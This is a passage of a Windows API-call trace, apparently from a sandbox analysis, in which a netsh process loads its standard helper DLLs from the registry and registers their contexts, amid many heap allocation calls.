[0189.242] GetProcessHeap () returned 0x2c0000 [0189.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc08) returned 0x3070f0 [0189.242] GetProcessHeap () returned 0x2c0000 [0189.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x306530 | out: hHeap=0x2c0000) returned 1 [0189.243] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nshipsec", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0189.243] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0189.243] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0189.243] GetProcessHeap () returned 0x2c0000 [0189.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x280) returned 0x307d00 [0189.244] GetProcessHeap () returned 0x2c0000 [0189.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe5c0 [0189.244] GetProcessHeap () returned 0x2c0000 [0189.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x302f30 [0189.244] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0189.244] GetProcessHeap () returned 0x2c0000 [0189.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x305770 | out: hHeap=0x2c0000) returned 1 [0189.245] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef4cf0000 [0196.039] GetProcAddress (hModule=0x7fef4cf0000, lpProcName="InitHelperDll") returned 0x7fef4cf6230 [0196.039] InitHelperDll () returned 0x0 [0196.039] RegisterHelper () returned 0x0 [0196.039] GetProcessHeap () returned 0x2c0000 [0196.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc60) returned 0x309f90 [0196.040] GetProcessHeap () returned 0x2c0000 [0196.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3070f0 | out: hHeap=0x2c0000) returned 1 [0196.041] RegisterHelper () returned 0x0 [0196.041] GetProcessHeap () returned 0x2c0000 [0196.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcb8) returned 0x30ac00 [0196.041] GetProcessHeap () returned 0x2c0000 [0196.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309f90 | out: hHeap=0x2c0000) returned 1 [0196.041] RegisterHelper () returned 0x0 [0196.041] GetProcessHeap () returned 0x2c0000 [0196.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd10) returned 0x30b8c0 [0196.042] GetProcessHeap () returned 0x2c0000 [0196.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ac00 | out: hHeap=0x2c0000) returned 1 [0196.869] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nettrace", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0196.869] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0196.869] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0196.869] GetProcessHeap () returned 0x2c0000 [0196.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a8) returned 0x307460 [0196.869] GetProcessHeap () returned 0x2c0000 [0196.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe7a0 [0196.870] GetProcessHeap () returned 0x2c0000 [0196.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x305da0 [0196.870] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0196.870] GetProcessHeap () returned 0x2c0000 [0196.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307d00 | out: hHeap=0x2c0000) returned 1 [0196.870] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef3250000 [0204.639] GetProcAddress (hModule=0x7fef3250000, lpProcName="InitHelperDll") returned 0x7fef3297360 [0204.639] InitHelperDll () returned 0x0 [0204.639] RegisterHelper () returned 0x0 [0204.639] GetProcessHeap () returned 0x2c0000 [0204.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd68) returned 0x3104a0 [0204.640] GetProcessHeap () returned 0x2c0000 [0204.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30b8c0 | out: hHeap=0x2c0000) returned 1 [0204.640] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="WcnNetsh", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0204.640] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0204.640] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0204.640] GetProcessHeap () returned 0x2c0000 [0204.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2d0) returned 0x30b890 [0204.641] GetProcessHeap () returned 0x2c0000 [0204.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe6a0 [0204.641] GetProcessHeap () returned 0x2c0000 [0204.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x3102b0 [0204.641] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0204.641] GetProcessHeap () returned 0x2c0000 [0204.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307460 | out: hHeap=0x2c0000) returned 1 [0204.641] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef4c50000 [0206.365] GetProcAddress (hModule=0x7fef4c50000, lpProcName="InitHelperDll") returned 0x7fef4c528e4 [0206.365] InitHelperDll () returned 0x0 [0206.365] RegisterHelper () returned 0x0 [0206.365] GetProcessHeap () returned 0x2c0000 [0206.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xdc0) returned 0x312620 [0206.366] GetProcessHeap () returned 0x2c0000 [0206.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3104a0 | out: hHeap=0x2c0000) returned 1 [0206.366] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="p2pnetsh", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0206.367] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0206.367] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2f8) returned 0x307460 [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe6c0 [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x30be70 [0206.367] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30b890 | out: hHeap=0x2c0000) returned 1 [0206.367] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef4b20000 [0210.235] GetProcAddress (hModule=0x7fef4b20000, lpProcName="InitHelperDll") returned 0x7fef4b25568 [0210.235] InitHelperDll () returned 0x0 [0210.235] RegisterHelper () returned 0x0 [0210.235] GetProcessHeap () returned 0x2c0000 [0210.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe18) returned 0x31b3f0 [0210.235] GetProcessHeap () returned 0x2c0000 [0210.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312620 | out: hHeap=0x2c0000) returned 1 [0210.235] RegisterHelper () returned 0x0 [0210.235] GetProcessHeap () returned 0x2c0000 [0210.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe70) returned 0x31c210 [0210.236] GetProcessHeap () returned 0x2c0000 [0210.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0210.236] RegisterHelper () returned 0x0 [0210.236] GetProcessHeap () returned 0x2c0000 [0210.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xec8) returned 0x31d090 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c210 | out: hHeap=0x2c0000) returned 1 [0210.237] RegisterHelper () returned 0x0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf20) returned 0x31b3f0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d090 | out: hHeap=0x2c0000) returned 1 [0210.237] RegisterHelper () returned 0x0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf78) returned 0x31c320 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0210.237] RegisterHelper () returned 0x0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfd0) returned 0x31d2a0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c320 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1028) returned 0x31b3f0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d2a0 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1080) returned 0x31c420 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10d8) returned 0x31d4b0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c420 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1130) returned 0x31b3f0 [0210.239] GetProcessHeap () returned 0x2c0000 [0210.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d4b0 | out: hHeap=0x2c0000) returned 1 [0210.239] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="wwancfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0210.239] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0210.239] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0210.239] GetProcessHeap () returned 0x2c0000 [0210.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x320) returned 0x3104a0 [0210.246] GetProcessHeap () returned 0x2c0000 [0210.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2fe720 [0210.246] GetProcessHeap () returned 0x2c0000 [0210.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2fe700 [0210.246] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0210.246] GetProcessHeap () returned 0x2c0000 [0210.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307460 | out: hHeap=0x2c0000) returned 1 [0210.246] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef4c40000 [0213.844] GetProcAddress (hModule=0x7fef4c40000, lpProcName="InitHelperDll") returned 0x7fef4c420c8 [0213.844] InitHelperDll () returned 0x0 [0213.844] RegisterHelper () returned 0x0 [0213.844] GetProcessHeap () returned 0x2c0000 [0213.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1188) returned 0x31c530 [0213.844] GetProcessHeap () returned 0x2c0000 [0213.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0213.844] RegEnumValueW (in: hKey=0x90, dwIndex=0x13, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="wlancfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0213.845] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0213.845] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x348) returned 0x310be0 [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x30b010 [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x30b050 [0213.845] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3104a0 | out: hHeap=0x2c0000) returned 1 [0213.845] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef4a00000 [0217.440] GetProcAddress (hModule=0x7fef4a00000, lpProcName="InitHelperDll") returned 0x7fef4a0613c [0217.440] InitHelperDll () returned 0x0 [0217.440] RegisterHelper () returned 0x0 [0217.440] GetProcessHeap () returned 0x2c0000 [0217.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11e0) returned 0x31d6c0 [0217.441] GetProcessHeap () returned 0x2c0000 [0217.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c530 | out: hHeap=0x2c0000) returned 1 [0217.441] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="peerdistsh", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0217.441] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0217.441] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0217.441] GetProcessHeap () returned 0x2c0000 [0217.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x370) returned 0x31e8b0 [0217.441] GetProcessHeap () returned 0x2c0000 [0217.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 0x30b070 [0217.442] GetProcessHeap () returned 0x2c0000 [0217.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e) returned 0x315d80 [0217.442] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0217.442] GetProcessHeap () returned 0x2c0000 [0217.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x310be0 | out: hHeap=0x2c0000) returned 1 [0217.442] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef3070000 [0219.546] GetProcAddress (hModule=0x7fef3070000, lpProcName="InitHelperDll") returned 0x7fef30ee69c [0219.556] InitHelperDll () returned 0x0 [0219.613] RegisterHelper () returned 0x0 [0219.613] GetProcessHeap () returned 0x2c0000 [0219.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1238) returned 0x31c3f0 [0219.613] GetProcessHeap () returned 0x2c0000 [0219.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d6c0 | out: hHeap=0x2c0000) returned 1 [0219.613] RegisterHelper () returned 0x0 [0219.613] GetProcessHeap () returned 0x2c0000 [0219.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1290) returned 0x31ec30 [0219.614] GetProcessHeap () returned 0x2c0000 [0219.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c3f0 | out: hHeap=0x2c0000) returned 1 [0219.614] RegCloseKey (hKey=0x90) returned 0x0 [0219.614] GetProcessHeap () returned 0x2c0000 [0219.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2340 | out: hHeap=0x2c0000) returned 1 [0219.614] GetProcessHeap () returned 0x2c0000 [0219.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de090 | out: hHeap=0x2c0000) returned 1 [0219.616] GetProcessHeap () returned 0x2c0000 [0219.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec030 [0219.616] GetProcessHeap () returned 0x2c0000 [0219.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.617] RegisterContext () returned 0x0 [0219.619] GetProcessHeap () returned 0x2c0000 [0219.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0219.619] GetProcessHeap () returned 0x2c0000 [0219.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.660] RegisterContext () returned 0x0 [0219.661] GetProcessHeap () returned 0x2c0000 [0219.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec130 [0219.661] GetProcessHeap () returned 0x2c0000 [0219.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.662] RegisterContext () returned 0x0 [0219.662] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0219.662] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0219.662] GetProcessHeap () returned 0x2c0000 [0219.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.663] GetProcessHeap () returned 0x2c0000 [0219.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec130 | out: hHeap=0x2c0000) returned 1 [0219.664] RegisterContext () returned 0x0 [0219.665] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0219.665] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0219.665] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0219.665] GetProcessHeap () returned 0x2c0000 [0219.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.666] GetProcessHeap () returned 0x2c0000 [0219.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0219.666] RegisterContext () returned 0x0 [0219.667] GetProcessHeap () returned 0x2c0000 [0219.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x312a70 [0219.667] GetProcessHeap () returned 0x2c0000 [0219.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0219.668] RegisterContext () returned 0x0 [0219.668] GetProcessHeap () returned 0x2c0000 [0219.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.668] GetProcessHeap () returned 0x2c0000 [0219.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0219.669] RegisterContext () returned 0x0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0219.669] RegisterContext () returned 0x0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x312ec0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0219.669] RegisterContext () returned 0x0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x230) returned 0x313090 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0219.802] RegisterContext () returned 0x0 [0219.802] GetProcessHeap () returned 0x2c0000 [0219.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a0) returned 0x325b60 [0219.802] GetProcessHeap () returned 0x2c0000 [0219.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313090 | out: hHeap=0x2c0000) returned 1 [0219.803] RegisterContext () returned 0x0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x312ec0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0219.803] RegisterContext () returned 0x0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.803] RegisterContext () returned 0x0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0219.804] RegisterContext () returned 0x0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0219.804] RegisterContext () returned 0x0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x3131e0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0219.804] RegisterContext () returned 0x0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x380) returned 0x325b60 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0219.805] RegisterContext () returned 0x0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3f0) returned 0x325ef0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0219.805] RegisterContext () returned 0x0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x460) returned 0x3262f0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325ef0 | out: hHeap=0x2c0000) returned 1 [0219.805] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4d0) returned 0x325b60 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3262f0 | out: hHeap=0x2c0000) returned 1 [0219.806] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.806] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0219.806] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0220.583] RegisterContext () returned 0x0 [0220.583] GetProcessHeap () returned 0x2c0000 [0220.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x312ec0 [0220.583] GetProcessHeap () returned 0x2c0000 [0220.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0220.583] RegisterContext () returned 0x0 [0220.583] GetProcessHeap () returned 0x2c0000 [0220.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x230) returned 0x326040 [0220.584] GetProcessHeap () returned 0x2c0000 [0220.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0220.700] RegisterContext () returned 0x0 [0220.700] GetProcessHeap () returned 0x2c0000 [0220.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a0) returned 0x312ec0 [0220.700] GetProcessHeap () returned 0x2c0000 [0220.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326040 | out: hHeap=0x2c0000) returned 1 [0220.701] RegisterContext () returned 0x0 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0220.701] RegisterContext () returned 